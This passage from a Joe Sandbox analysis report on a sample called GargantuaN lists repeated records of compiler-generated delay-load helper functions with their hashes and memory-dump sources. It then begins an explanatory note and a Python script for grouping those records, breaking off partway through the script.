                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 90daf35dd19f98ab5fd941a3d13913059d51975ce1c0d931ffbe6684fce60eae
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 90daf35dd19f98ab5fd941a3d13913059d51975ce1c0d931ffbe6684fce60eae
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a00f4523287120db6a6786a13402f379e891f32012d1e7a805e16f46803758a9
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: a00f4523287120db6a6786a13402f379e891f32012d1e7a805e16f46803758a9
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b6b17324f66444e037516d7cb7c3f5e7288a4479bbd8bc6a2f49cebcbfe10c3c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: b6b17324f66444e037516d7cb7c3f5e7288a4479bbd8bc6a2f49cebcbfe10c3c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 4f0b66699b24f5b818a2c4a1e910adccc71fe25efa1f2832e5ea8bd8f4ec1654
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 4f0b66699b24f5b818a2c4a1e910adccc71fe25efa1f2832e5ea8bd8f4ec1654
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2f22bde702909a8e3c20cb00251963abadcc272d66d01cc62042960d757c87b2
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 2f22bde702909a8e3c20cb00251963abadcc272d66d01cc62042960d757c87b2
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: d8b2b856571ca292340c1f02d6370c3e0199a20e45194a616ed2a3d60634c40c
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: d8b2b856571ca292340c1f02d6370c3e0199a20e45194a616ed2a3d60634c40c
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cc435344897bbf2d613591a017095b9d37e04e56cf6f55ad5f3fab8064067843
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: cc435344897bbf2d613591a017095b9d37e04e56cf6f55ad5f3fab8064067843
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 3b6b05ac4538ec92367510c95b80a8d16767be94476b8c9963cf3053673059de
                                                        • Instruction ID: b4778b600c768bf0fa3c168faced2accb3882ec99a2e5c41d85b7274523fc5cb
                                                        • Opcode Fuzzy Hash: 3b6b05ac4538ec92367510c95b80a8d16767be94476b8c9963cf3053673059de
                                                        • Instruction Fuzzy Hash: 0CA001EA6A9242FE3548A2526D16C3B131DC4C6B61330996EF856C5485E8A4A84929B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8434583daaf2e3bd9c6f7b955825ec7ce556ecf26497222c1e7afa85722ff847
                                                        • Instruction ID: 0406648fe4858102057d098e0f8c802a982b10e5a8149ab9a3c05a5c6d26fbc9
                                                        • Opcode Fuzzy Hash: 8434583daaf2e3bd9c6f7b955825ec7ce556ecf26497222c1e7afa85722ff847
                                                        • Instruction Fuzzy Hash: 27A001EA2A9152BE314862516E07C3B431DC4C2B26330A52EF865A6591EC90584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 36b68720f046198f02c27fd7c5ab63abaabf1b836828ba9a7f645e2b25e85064
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: 36b68720f046198f02c27fd7c5ab63abaabf1b836828ba9a7f645e2b25e85064
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2fe184eddbcd9a27163e6c57fd8713d097cacbb65785b58a69a2c70ffdb740b6
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: 2fe184eddbcd9a27163e6c57fd8713d097cacbb65785b58a69a2c70ffdb740b6
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ae9efc515ac3e0870fb20c0945aa85ec0c14349bf7d5b049919707b02f74f37d
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: ae9efc515ac3e0870fb20c0945aa85ec0c14349bf7d5b049919707b02f74f37d
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: cc3fdc7cc90a41f0fad11f7d75a722c1fea8ce77bbc3989795dfc7470b1133bb
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: cc3fdc7cc90a41f0fad11f7d75a722c1fea8ce77bbc3989795dfc7470b1133bb
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f1422a8f8e5907020219d0840372642436c4d068d4d33ff6d2c5e30f83d46da5
                                                        • Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
                                                        • Opcode Fuzzy Hash: f1422a8f8e5907020219d0840372642436c4d068d4d33ff6d2c5e30f83d46da5
                                                        • Instruction Fuzzy Hash: E1A001EA2A9152BE314862516E07C3B431DC4C6B62330A92EF856A6591E890584A19B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: bf314098f21ab5582adb04463bdca086bee7a6a3c500479ba989ed36c0abdb59
                                                        • Instruction ID: 10511869b50de81eb6122bd7fe746875c609e74b9730ec91e79dc64b66c15424
                                                        • Opcode Fuzzy Hash: bf314098f21ab5582adb04463bdca086bee7a6a3c500479ba989ed36c0abdb59
                                                        • Instruction Fuzzy Hash: 0AA011EA2AC022BE300822A22C03C3B030CC0C0B20330A82EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ece90da1127bb054f10ae6b782a1feda3a77c01c43c1c289b3d61b57452da379
                                                        • Instruction ID: 10511869b50de81eb6122bd7fe746875c609e74b9730ec91e79dc64b66c15424
                                                        • Opcode Fuzzy Hash: ece90da1127bb054f10ae6b782a1feda3a77c01c43c1c289b3d61b57452da379
                                                        • Instruction Fuzzy Hash: 0AA011EA2AC022BE300822A22C03C3B030CC0C0B20330A82EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b2496eb0fb2252deb44312bb5af6bebf9f0e2cf9fd10945c5b4cd096f1aaf54f
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: b2496eb0fb2252deb44312bb5af6bebf9f0e2cf9fd10945c5b4cd096f1aaf54f
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
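The records above are all the same kind of function: each one calls ___delayLoadHelper2@8 and, through the subcall at 00D6E85D, can reach RaiseException with code C06D0057, and their Instruction IDs and instruction fuzzy hashes collapse to a handful of distinct bodies, all scored -1.00% on uniqueness. The script below is an added example and not part of the Joe Sandbox report or its IDA plugin. It parses records written in this listing's layout, decodes the exception code (0xC06D0057 is VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER): severity bits 11, facility 0x6D which is FACILITY_VISUALCPP, Win32 error 87, the value the CRT delay-load helper raises for a delay-load descriptor it rejects, while 0xC06D007E and 0xC06D007F are the module-not-found and procedure-not-found variants), and groups records by Instruction ID so an analyst can set compiler-generated delay-load thunks aside before spending time on the sample's own code. The record text embedded in the script is constructed for the example, with hashes and addresses copied from the records above; the regexes are assumptions about this page's layout, not a documented Joe Sandbox schema.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample input for this example (not a page excerpt): three
# function records in the "APIs / Similarity / Uniqueness" layout used by the
# listing above. Hashes and addresses are copied from that listing.
SAMPLE_RECORDS = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
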